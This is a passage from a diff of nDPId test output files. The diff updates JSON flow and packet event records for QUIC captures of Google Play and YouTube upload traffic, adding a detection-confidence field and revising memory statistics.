tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tcGxheS5nb29nbGUuY29tTF5QaJRKaTNoSpJ2byVw\/n2jR\/SXiDAUaxRXCyDlaH13oYGRvmmLh5UfnwV+qkP8rBLql6P0cVhpCGDXJyou7qdg+dnByWJAkTSY+CUh8yfYOYMRdIFYIeO6ZKEQGzvhOWxsGdkkbQk0joNdUTA0NgHogWCSkhrofu2AhqIVgpFc9hnRMDAwMDAwMDAg1WpdFEihkws6cxoJh1cnEudv5EFFU0dDaHJvbWUvNzQuMC4zNzI5LjE1NyBBbmRyb2lkIDguMC4wOyBCTkQtTDIxqZ2LiTEPPlI5bOtRl2sWwwAAAABYNTA5AQAAAB4AAAA+5+ExAY9KZ43WAi5gboQGad\/XZY9NgsCyvAvlen24imYZuixux5QJ4+eD6hkpSGJfDn9+XBFyJ61rFG0t2MkrZAAAAAEAAABDMjU1M\/in8FpHdkpOU1RQM\/in8FpHdkpn+K3FgBXj\/3u4AAAAAPAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00737{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"Chrome\/74.0.3729.157 Android 8.0.0; BND-L21"}}
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559632338055,"flow_last_seen":1559632338055,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1559632338055,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"play.google.com","user_agent":"Chrome\/74.0.3729.157 Android 8.0.0; BND-L21"}}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1559632338083,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1559632338083,"pkt":"AAAAAAAAAAAA4JDHCABFAABAAABAADQRHsSZFLfLrB0q7AG7lZQALNrDw1EwNDYF6s\/m5wbfJy0AAAAFbGsm7eq1vsQbMX0cQAQkIAMA"}
 02250{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1559632338308,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1559632338308,"pkt":"AAAAAAAAAAAA4JDHCABFgAViAABAADURGCKZFLfLrB0q7AG7lZQFTiJnQAtQvT4L41LYkTDHbWnvY3Q7xNlk7lPAOJoU7qSEDNxr\/eXA5HdvGouKSa5JA+EfJXVcrF5I8JeTQOik+2bWgM1nMhrT0SQGJgoDC3vmiFQsGJJjkMZScnfQIf1wQxM8bMy1rX9IG5gNouAF2UDgTxNWxp8Z+kpanynzPm9Aewt1Q8YQSGSHVmFR2wS\/qJorTHWD8seoBDxiXr\/Jrzhp+T4G7aWy+PK4peW1lunM5ZwayH+2G6AF72mr+9NShIq31T+R\/i7G00e0d8lC08arFgrP7xbHltzNsevJw7TO7heoxYjLOdwd79cQPJBHGN6cAkZED6B76kDGTUdX1AYSpun6LhwRHlxgVuFQtfE7y\/DnLBUYzAcWntPYNYvGghUNITCLh8lnobrCJOOpgpG31oH5+kuwGIUSXbKA+01pRlfgd5gXolZKhK3pWOerj\/frjDS+2g8vClgYRT1+lV7rb2y\/Iik5yjyOhRlKWs5VLZ7VCWYVKqICcZsTvon\/NMVVMYb6HJJ32Yz2ORvo8ebpxTje4yqrxC+qapfY5RwYmEaDmI1L2w04UoqZ0dJ1NSSxDm6HXMu+ZshF6SujBNEG42mGdRf6IaSoNlxzMkSyrtk+YmufaVAWXNamgtbe+ZtSIpyI7W+63DDWITJezj4w9w00cUFEntoLNlOB+zElDxYScTOE3CpSs44g2fcVw+4rvMHfwuxPeTdHzp4MAsePKq+zngj\/90JBFE\/tDfTVYbaRpu5lmM3pDSvtX0fT5TvOH843VTAPlB2fm8MHtEMU7PIrg8lvLI5kYBqaI59yOALOtxEFcXeKMhTylktz05RjIrZg6ifgDckMo48nJYsJtSpscdyoK9zfGzj4NaovMFvwwWNIopaYds\/P+xBZkC90KYsz06jFDLqNdcZXDkHaPFJXZAxXx9set1Fg3lj6r\/AobA8N7sLKydAgxC\/rtEWCBX5wbSuX8kpFOJgGKfLdk0JYmC7zbnJyfyy+C6ukhZHN0cU81AFqszDmIIshOZAY4iWz5aWIzL1ctZtibQ5iLAcoUfb250TuivT+FGWq8x3DLfXpYTdXUgbMkK8lTQJuOYtFhD4fHRbg8qZIkwDODXwLSUcnqUn+Q2uzh8PtHzNYdam5Obh2M8GgLW8ukG2P6sOp8CokFzXYzFsiExtyxRsQxvskOlQmLevtIDnsShgWKCRO7UN+uhRGaYGLmSq2\/5t1JyMiF0cem8I\/nOK0mRwXY7N+ECcoaRDXyTKJR\/4pe4u8s4tPdTtCzoa7o8ItJAgr6FkTuYLEo2hwMyPm4hV38utdskBYyUhI6Vz27vbgYAi5nzlUMaKyr3bk72PVb2h6cE+5pbWp8t27oXh4ceZgCJ1CqxGsEI5zHMEsBX6U\/74OCgAAVZMzKh0lFrwDdkIuV+i7biu6I3DoZxr1X50m6VKkaA+qvAjpG+BPOMuRH3\/5\/vE6iwiiUVaV8HIEZpVud+gx9Rzu573VwQ87CJfVs7RmgLI88d6qzIEQAYp5JQrr2lJf1+r4xl60u3ZAa+E+ox2R3gSbE67e9uWolVz8QS9Ep2IK7cfXKJOfNxu70MQcIVFRson71WUtcVpILsaqgb9rATvfzoNmtskVITRoIpqD+mi2ZJvPx6FmM5uP7YQiAppyWykt6puGjRFKGSfbt2gGFGLSdxE20Jo0zgDKZvUFlb4u07xu5j8JVjk7HreBYMQixh6ugURELWsT7GFnQi1VQvh64jRAmDcuARkYMw2228CWbF39WsM9a4SaEoLaEPaqo3lcdKo0+Sgn7WsqvH1w"}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1559632338055,"flow_last_seen":1559632338367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":20401,"flow_avg_l4_payload_len":1020,"midstream":0,"ts_msec":1559632338367,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1559632338055,"flow_last_seen":1559632338367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":20401,"flow_avg_l4_payload_len":1020,"midstream":0,"ts_msec":1559632338367,"l3_proto":"ip4","src_ip":"172.29.42.236","dst_ip":"153.20.183.203","src_port":38292,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
 00156{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q46.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595453 bytes
-~~ total memory freed........: 4595453 bytes
-~~ total allocations/frees...: 99574/99574
+~~ total memory allocated....: 4680406 bytes
+~~ total memory freed........: 4680406 bytes
+~~ total allocations/frees...: 101164/101164
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 161 chars
 ~~ json string max len.......: 2255 chars
diff --git a/test/results/quic_q46_b.pcap.out b/test/results/quic_q46_b.pcap.out
index edc9d82ae..45a99d65b 100644
--- a/test/results/quic_q46_b.pcap.out
+++ b/test/results/quic_q46_b.pcap.out
@@ -1,10 +1,10 @@
 00442{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_q46_b.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1561708873328,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1440,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1440,"pkt_l4_len":1358,"ts_msec":1561708873328,"pkt":"AAAAAAAAAAIAGNwmCABFAAViWnxAAD0R9xCsG0XYbueGI7HaAbsFTnXjw1EwNDZQ0aOrrPYcbNEAAAABZ49NM0tlJ\/QWOEX0oAEEAENITE8ZAAAAUEFEAOsBAABTTkkA\/QEAAFNUSwAzAgAAVkVSADcCAABDQ1MARwIAAE5PTkNnAgAAQUVBRGsCAABVQUlEmAIAAFNDSUSoAgAAVENJRKwCAABQRE1EsAIAAFNNSEy0AgAASUNTTLgCAABOT05Q2AIAAFBVQlP4AgAATUlEU\/wCAABTQ0xTAAMAAEtFWFMEAwAAWExDVAwDAABDU0NUDAMAAENPUFQUAwAAQ0NSVCQDAABJUlRUKAMAAENGQ1csAwAAU0ZDVzADAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLXVwbG9hZC55b3V0dWJlLmNvbXgDMRgyNKjZnbeNIexiej4o7qx+V929kxA9dDLsNr49+J4e7Bxt\/tr6btXxr2ajG15fa3Ruq1EwNDYB6IFgkpIa6H7tgIaiFYKRXRXJTjAwMDAwMDAw6FYYVlvjBaujP6e+o70a5ZenNg5BRVNHY29tLmdvb2dsZS5hbmRyb2lkLnlvdXR1YmUgQ3JvbmV0Lzc2LjAuMzgwOS4w1Y68K3sgywV7JQccxBohdQAAAABYNTA5AQAAAB4AAACrpFnJA5r+YO5RcQGpd1l4yFvK+8akrX8Ivr05rqkgauMBpMQ6cwQFDJS6sLs7Du5\/2eIOY7vG9b+CMCy0OZxEZAAAAAEAAABDMjU1jtxYjsj\/DkhJRldhQUtEM47cWI7I\/w5IZ\/itxYAV4\/+8OAwAAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"com.google.android.youtube Cronet\/76.0.3809.0"}}
+00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561708873328,"flow_last_seen":1561708873328,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1561708873328,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"upload.youtube.com","user_agent":"com.google.android.youtube Cronet\/76.0.3809.0"}}
 00541{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1561708873357,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":44,"ts_msec":1561708873357,"pkt":"AAAAAAAAAAIAGNwmCABFAABAAABAADgRW69u54YjrBtF2AG7sdoALCZ3w1EwNDYF0aOrrPYcbNEAAAABKUO4TMFStZdbdRt4QAEkVwEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
 02331{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1561708873447,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1440,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1440,"pkt_l4_len":1358,"ts_msec":1561708873447,"pkt":"AAAAAAAAAAIAGNwmCABFAAViAABAADgRVo1u54YjrBtF2AG7sdoFTr6M01EwNDYF0aOrrPYcbNEAAAAC\/8YjGS48qVhChWSun\/F\/0tw83QKJDLWjBYJA09IzRzwLQnCpg9NyEHpzaflUNehkOBavOBhu3YQm9xnHynBS8TFlxf6b7SbJ212GvxrQorob1FGVAX8oQ4qlKdNcH9KmGH8FQqiWXAUdP4wIv8bxJlPu0eWjvrQVEV4+WIaZItIH+aOUaSN9\/ilrA9RvBf\/Eg0uWYctKOmpFEGA9LEKr3HlpKp21MHHYkSpIqfP4A7ajmPfUk0qEmleXgrgJc3ZuVwkOUh+lp\/0eDnUOVGnw0Bef\/nRJzAy9BZYUOHKfKJigrc1SrncXcXGesF5G8MJfo5lQQeKDSwoFevbeXZPRaK1FV8AI13mn1U7+k+RqYwMfqTzjcryU\/s5BA04mts+Ch050+b0vPi6EOfeOA1CLxv\/tk6KsNDiigEk01rPLNm\/hEnaVJMANIzUHvUP4jg3PU04wvG3u8GEaxXwy79Kn6368OsQ8hdAqoLyQpQyhi1ABBqvxZWZGsUTcum\/BfVuIRpmo5YvcWIiYFY\/Q6OXLR9R2vVMjhnQvgbZY+rzI0fcZRdscepkhRGzz77vGIKYhgUxMxPqTprvkoXFsDJnTqnp4n2GwWBLIb0OyfRf\/7VRBKuLzhYfdO+kGKah6INzDv1vEkf39Q6kBHznQt9lH735l+OscDivp0nZu4MdQyN7vfOJNp9+jgtg8n2ANvCzvvW+7oAPTELH+3+cxxBeh66ejadW2+\/yfNqGNsYWunD\/XCKd4D2V+lhoYnV56+qwSLgUXXWB2mY\/jm0ycFhQ\/Q6nqSn\/I2aBJISRolyEFPYh65rNrttlVuSy4cI8laG8Su6VBG5Uuo4K9zFSe74fhMvn\/3xxSa9X04Mry4juPeEmANXZBAppqqM0xlJabIn2HLD847OZiYuNRgulowJTRYa0BeXeFFYwg5asYjFOcmIPelC6rywwM4C200+37pJCuqYhl7VRwKcsiCZz5pFD6vxpCnxBkjn70ZSRCzczW97N+mAXR4TjhOAdfEQuhrY7Y+WOOlG0I5lw5fpu2\/+2zMe3NZEICyLuE+yMXBwxKksv83s\/2DTmSfmADa1Lt+OXCdJZp8e\/fI5MOWyzXREHAWA0p1Xxf0JQBAFaDVmD71NXRa\/e3YP6nmQf+KzlbGl8euL1ZMv9cv4hs6puTZquoiq4UkwuYeq+A+wUrbkmifgCFGTsiIuVdxZoBfG7mmTcuzlAoj7eSy93FWGxAPnzH+xvdqwSDn+7M9vnHHpWIC+VzveE\/CCes4f3ceohr7y5Dn4lOtoe0vJsPwQpFPf9WtVwM8s2MSRZtgUxdYy5XHczX5uN1c9SlpRqooXhpp0yi4N2DxMNkDHytOhz\/qgou3wcDLhbNb1ToJSHgg+yYI1HFM5GCUBgIcEFdWUnHIoDy\/X\/\/efj02fBjznW3x\/I9rMer6Tvkfo0yrJwxvKS3Vqlk4oY2riLgvgmR0l5D63Voz6cwqCDFk4DSzDUTn584mcKd5zBHU9ozz0R3Cik1cL2iA9pnd7oEAwphcmb3YbMTagxytlPSkDBIcz0Kd4BlZBLPTo1k6ef5SlDhP6oHZInjU+ubb+1fUF0evxg8wgtXW0cZjOTqIqNyOZPsUhY\/78wYZIpgpZZEa60kxvwRBUQ6WZuEEAWO4u8bU4NqJQII0XYAAfp5H0\/BDB\/p+vVgnc1k2DvUWm66+G5dwcauNbi4ru1irvoLehKJx5aMF+fJOZNqPIwy+\/4iFLOkcGGA36sQMRqTOLRYNzYbHYC8YZ\/SOqMCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00660{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1561708873328,"flow_last_seen":1561708876422,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5220,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1561708876422,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1561708873328,"flow_last_seen":1561708876422,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5220,"flow_avg_l4_payload_len":261,"midstream":0,"ts_msec":1561708876422,"l3_proto":"ip4","src_ip":"172.27.69.216","dst_ip":"110.231.134.35","src_port":45530,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTubeUpload","breed":"Fun","category":"Media"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"quic_q46_b.pcap","alias":"nDPId-test","total-events-serialized":8}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 20/20
@@ -14,9 +14,9 @@
 ~~ total active/idle flows...: 1/1
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4595455 bytes
-~~ total memory freed........: 4595455 bytes
-~~ total allocations/frees...: 99574/99574
+~~ total memory allocated....: 4680408 bytes
+~~ total memory freed........: 4680408 bytes
+~~ total allocations/frees...: 101164/101164
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 163 chars
 ~~ json string max len.......: 2336 chars
diff --git a/test/results/quic_q50.pcap.out b/test/results/quic_q50.pcap.out
index d4fe1712e..a080c6701 100644
--- a/test/results/quic_q50.pcap.out
+++ b/test/results/quic_q50.pcap.out
@@ -1,10 +1,10 @@
 00440{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"quic_q50.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1592388088469,"flow_last_seen":1592388088469,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1592388088469,"l3_proto":"ip4","src_ip":"248.144.129.147","dst_ip":"184.151.193.237","src_port":39203,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02254{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"quic_q50.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1592388088469,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1592388088469,"pkt":"AAAAAAAAAAUAeJuECABFAAVi6fZAAD8RV+v4kIGTuJfB7ZkjAbsFTkJ3y1EwNTAI30oInk7\/XnoAAEU0Sh+G6jJaQ+WVeKqfVhwekyVcdAg3VVt4yXAoIvukSElad3ZdF7cP3aK8QwnOEdppZZL4NlS1J14QMkJkSKLH7KTs\/J1g5Qy7Td2oJivMgU4heBjsrEKX+Kl+zumCGj7r3rx\/PiGGoerDCuUYVs8\/3DPxrp05vPpL4oM6Ym20RL14LkdkclpZEotPzAVfKrp+bORIrEsOakCOFcnmRLxpaPe+skuFxQ7e+No86i++ZXUpHINRIOrrAKO6MnqhHg136TH30JRy5V1vvrx9mRvozkvzR4RrmmOWFYy9MHcYvR9ozsenVMRZ7mYRkPWmCIPXpnhEE4otBm+PYFJSnVZnoQYn2HvDgKZX+IG0tDtVasnvuIWtUyehZMOA3Auz2JN+nSjxfDEV9Q5eGeh8ZL7tXInICXQpmTBohUGs0nyUi\/EfxDhlCRPETyBYxPytgznwCOTRnGV6yUDNYNW6V2twpvbbFw15F57Y24i98N43glYYJUVqHmVwrosseQvdWLtOLEXpAKvwYCJ3nJpSVOyBYXd8okAO08VeVbydpen0iUOESN83ACwm402annjMIqbJEkKbZr1E\/bWLUE9ayryc3t4SI0rfAV3P7Bzoh+ePS0lFG2mEbR3Stl4jejVA5bbBNdQAl2XVCvlfkMcgN6wNzkaUtoY\/V5wJqcqWfzxU\/7CxIyuqjs2t5GkAirbR6GD1vSMG8A49cBdJIe0YUwOEL94vJZZ6kgFxLSzbkqIb\/JGeunCp3ImPtw51lpSKmOzgu+aiRAw0072bcZedmowvyNmMZ6ZwF9G2\/T1BzTiaxUQiuwph0MpDNq0KE8ZLx7252+rHJYkpatjHePpFvOb3XaUfP7KqMGQXysXzDurgMN+iUJmRB27gfV7BceLcaKv4JsOEla7D\/ujhuQ0U6YFyo2O4mZUs06yMlW36Jh9WkejggHA6SE58C6aM0tZVAq4PzUVmlUFs52p22qgRq5vex74TEu58hdkCQjr1pQ94XFmXqgk+AVK0nXtqdM4JYhPeaV0edHucrnphtrDalQIUwHX7zoFqP\/AzYEoeCztqDi\/kawodxc4PmEb6NM25k\/CXUeCX4uUwv5+p46bN3O1M+xvlb2rRRFG9UZ157Oh+jebOu+0rTdiK67yyDJDMe2VTvGsXi+\/G2gN2zIWwGydc\/InHPRNNQKfHhC2jggd6wv4d71pPOaI+XNe1l7JNMzHwfbkZBDlCbcSj+rryXRGPQIhCscDZiFFGrGBnyyH57ea6sGM\/d37gVVa+ukJTnovNq\/9LafSrWBaF2RrNYGE+TcplNYI0Sq5eb9DrfHpoz4HPjO4w6uwZIeHQjlw00+daMYbUpNYvzBru4JYoG4+FnfLnaJ2RX6rVgfBQIqnPe+8ho+oVfDUJnsA6e5JTlC5uDUaaRcrC0+Ji\/wYvhpr9KixWcINr\/Q6IJf8RuaNMWGUoYQRmSfJSGr9d2O1TlO6mLpi0PyY9rao+oramJEZVMS9CvaFzYMM4ekODEtI9lvm8GVMwUuwhbqucZBCNIlAueuvDA9mFax9H3Da0FnXF80HbkF0G0pCqtWSLbDFAFtV9SICp3zwHTJ2IckUyzfK6paD68rLKFhUUBI7WeX4+s0d4Jr10hLHheThooXnr5xOHtBeSEaQFC9zlGwwIuoXzDqApq3BbVKodu6HoOITstmadm3\